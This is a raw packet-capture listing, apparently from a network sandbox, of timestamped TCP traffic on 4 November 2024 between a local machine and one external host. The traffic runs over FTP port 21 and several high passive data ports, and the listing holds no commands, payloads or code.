                                            Nov 4, 2024 10:16:25.917587996 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.917690992 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.917706966 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.922411919 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922420025 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922435045 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922442913 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922447920 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922465086 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922503948 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.922503948 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.922782898 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922920942 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.922977924 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.923043966 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.927367926 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.927385092 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.927405119 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.927429914 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.927942038 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.927958965 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.927977085 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:25.927988052 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.928009987 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.928105116 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.928132057 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.932302952 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.932311058 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.932739019 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.933156967 CET5075250017110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:25.936117887 CET5001750752192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:26.103004932 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:26.136900902 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:26.137412071 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:26.142273903 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:26.142643929 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:26.142653942 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:26.149221897 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:26.681606054 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:26.830506086 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.075494051 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.075716019 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.080677032 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080688000 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080698967 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080715895 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080724955 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080729961 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.080758095 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.080784082 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.080790997 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080799103 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080836058 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.080852985 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080862045 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080872059 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.080902100 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.085577965 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085598946 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085608959 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085778952 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085789919 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085800886 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085844994 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085858107 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.085901022 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.085910082 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085920095 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085974932 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.085984945 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.085994959 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.086065054 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.086075068 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.090857983 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.090898991 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.090955019 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.090997934 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091008902 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091125965 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091135025 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091145992 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091155052 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091197968 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091517925 CET5878150018110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.091566086 CET5001858781192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.196741104 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.518811941 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:27.613878965 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.841684103 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:27.900051117 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:28.184540033 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:28.184973001 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:28.189853907 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:28.192183018 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:28.192312002 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:28.197144985 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.119743109 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.120043993 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.125061035 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125077009 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125097990 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125114918 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125123978 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125133991 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125139952 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.125149012 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125159979 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125212908 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125236988 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.125298023 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.125360966 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.125408888 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.130182028 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130194902 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130203009 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130218983 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130227089 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.130228043 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130239010 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130247116 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130268097 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130275011 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.130368948 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.130456924 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.130795956 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135190964 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135236025 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135245085 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135308981 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135324001 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135355949 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135411024 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135425091 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135432959 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135588884 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135646105 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135730982 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.136004925 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.136055946 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.189801931 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.259356022 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.264238119 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.614650965 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.615293026 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.620390892 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.620457888 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.620557070 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.625484943 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.893259048 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.104068041 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.514843941 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.516930103 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.521857023 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521877050 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521928072 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521936893 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521984100 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.521985054 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521997929 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522015095 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522022963 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522028923 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.522033930 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522080898 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522090912 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.522157907 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.526870012 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526880026 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526887894 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526904106 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526911974 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526921034 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526933908 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527000904 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.527051926 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527064085 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.527105093 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527348995 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.528774977 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.531923056 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531934023 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531949043 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531960011 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532118082 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532193899 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532206059 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.533652067 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.533763885 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.534280062 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.537852049 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.594424963 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.032507896 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.037321091 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.262309074 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.368158102 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.368757010 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.373636007 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.373703003 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.373780012 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.378555059 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.399874926 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.277887106 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.278115034 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.283596992 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283606052 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283615112 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283624887 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283632040 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283715963 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.283752918 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283761978 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283771038 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283893108 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283900976 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.284140110 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289246082 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289254904 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289264917 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289274931 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289284945 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289294004 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289325953 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289381981 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289539099 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289546013 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289547920 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289752960 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289761066 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289762020 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289772987 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294791937 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294801950 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294917107 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294926882 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294935942 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295068026 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295077085 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295208931 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295217991 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295353889 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295362949 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295665979 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.298237085 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.418055058 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:33.051167011 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:33.103003025 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.517585993 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.522532940 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.854044914 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.866190910 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.871131897 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.874892950 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.875107050 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.879945040 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.778814077 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.780551910 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785537958 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785551071 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785567999 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785588026 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785598993 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785643101 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785654068 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785684109 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785696983 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785698891 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785726070 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785756111 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785765886 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785804033 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.786154985 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790534973 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790545940 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790565014 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790575027 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790582895 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790617943 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790647984 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790657043 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790851116 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790946960 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790999889 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.791184902 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.795469046 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795572042 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795582056 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795768976 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795778990 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795862913 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795874119 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795886040 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.796037912 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.800203085 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.800540924 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.804433107 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.864317894 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:41.545667887 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:41.628184080 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:49.846080065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:49.851043940 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.204061985 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.208184958 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.213139057 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.213270903 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.213270903 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.218210936 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.127051115 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.127433062 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132412910 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132424116 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132431984 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132491112 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132570028 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132579088 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132587910 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132596970 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132607937 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132612944 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132627010 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132628918 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132642984 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132647991 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132653952 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132669926 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132699013 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137434959 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137444973 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137490034 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137521029 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137572050 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137643099 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137651920 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137695074 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137696981 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137708902 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137734890 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137756109 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137756109 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137765884 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137774944 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137797117 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137830019 CET5002356946192.168.2.5110.4.45.197
